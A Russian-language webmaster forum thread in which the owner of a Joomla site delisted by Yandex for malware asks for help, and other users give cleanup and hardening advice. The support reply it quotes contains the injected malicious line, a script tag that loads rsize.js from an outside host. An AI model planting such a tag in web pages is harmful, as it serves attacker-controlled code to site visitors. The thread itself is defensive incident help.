Вредоносный код... яндекс полностью выкинул из индекса мой сайт

Здравствуйте ув. форумчане.
2 дня назад увидел, что яндекс полностью выкинул из индекса мой сайт.www.monti-sib.ru Начал разбираться и увидел, что под названием сайта в яндексе написано:"Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Была проблема около 2х месяцев назад... было огромное количество кода типа (base64_decode. Но сейчас после проверки сайта такого кода не обнаружил. Обратился в службу поддержки, там написали следующее:

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

</html>
}

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными в статье http://help.yandex.ru/webmaster/?id=1116613

Итак вопрос: что за код? его функционал? как мне его обнаружить?
Спасибо тем, кто откликнулся на мою проблему

Откатите сайт - если есть бекапы.
Если нет, то найдите лишний код начинающийся с Будет масса заражённых файлов, их нужно будет все отчистить. Что делает именно ваш код надеюсь знаете чем расшифровать?
Потом прийдётся поискать файл который плодит его ( какой то лишний ), сменить пароли если не смотеже по логам найти как к вас поламали. ( вариант посмотреть в images и его подпапках лишний php файлик - скорее всего и будет запасным входом на случай смены пароля )

С другой стороны сайт стоит на Джумле - у джумла владельцев в большинстве случаев есть хобби забивать на апдейты и защиту от иньекций Тут больше нужно знать что стоит у вас, если уверены, что не за брутфорсили админку.

бекапов к сожалению нет. как проверить этот код я знаю. пару месяцев назад был точно такой же код, но там я так и не смог его удалить (точнее удалял, но либо сайт работать некорректно начинал, либо на следуюющий день появлялся вновь в тех местах, где я вчера его удалял). В общем с нуля сделал сайт и перезалил. Но проблема в том, что я знаю в "сайтостроении" только азы...и ничего больше... Ладно, буду гуглить что делать дальше.

Варианты, откуда появился код, такие быть могут:

1. Дырявый двиг
2. Стырили пароли от вашего сайта
3. Дырявый хостинг

Обратите внимание на этот скрипт: http://revisium.com/ai/ , а так же на услугу разработчиков данного скрипта : http://www.revisium.com/ru/order/

Смотри по времени изменения файлов.

Скачай сайт на локалку и ковыряй там.

Или отключи пхп на сервере, поменяй пароли и не включай пока не найдёшь.

А лцчше воспользуйся услугами понимающих в этом. Так как сам ты может быть что то почистишь, но скорее всего не всё. И через некоторое время всё повторится.

ftp выключить

Конгениально, Ватсон!
А чего только фтп выключить? Не надо себя ограничивать: лучше вообще выключить весь сайт целиком. Нет сайта - нет проблемы.
-------

Сайт на Джумле..
Зараза как была, так и осталась.
Во-первых забэкапить и выгрузить себе на локал, на компе быстрее будет.
Затем избавиться от стыренного неведомо где шаба (joomlashine.com/joomla-templates.html).
Полностью заменить все файлы движка, т.е. взять чистую джумлу последнего релиза и просто залить поверх с заменой всех файлов - это быстрее, чем проверять все подряд.
И затем уже искать код (выше почти все написали).